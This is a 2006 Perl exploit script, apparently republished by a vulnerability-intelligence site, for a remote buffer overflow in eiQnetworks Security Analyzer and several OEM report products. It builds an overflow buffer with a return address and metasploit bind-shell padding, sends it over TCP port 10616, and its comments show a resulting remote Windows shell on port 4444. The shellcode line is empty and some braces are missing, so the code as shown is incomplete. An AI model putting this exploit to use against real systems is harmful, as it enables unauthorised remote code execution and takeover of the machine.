Exploit for Security Analyzer by eiQnetwork
`#!/usr/bin/perl -w
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting
# kfinisterre@kfinisterre01:~$ telnet 4444
# Trying
# Connected to
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Network Security Analyzer\fwa>exit
# exit
# Connection closed by foreign host.
use IO::Socket;
$hostname = "";
$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit)
#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit)
# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:1262";
$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494";
$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262";
$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262";
$tgts{"4"} = "FortiReporter_4.2.26.exe:1262";
$tgts{"5"} = "AstaroReportManagerV37.exe:000"; # Unknown.. need serial
$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262";
unless (($target,$hostname) = @ARGV,$hostname) {
print "\n Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
print "\n";
exit 1;
$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";
$sc =
# win32_bind - EXITFUNC=seh LPORT=4444
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
$nops = "A" x ($b - length($sc));
$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . "&";
printf "Exploiting $hostname\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM);
$sock or die "no socket :$!\n";
print $sock "$buf";
print "Try connecting to port 4444 on the target.\n";
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo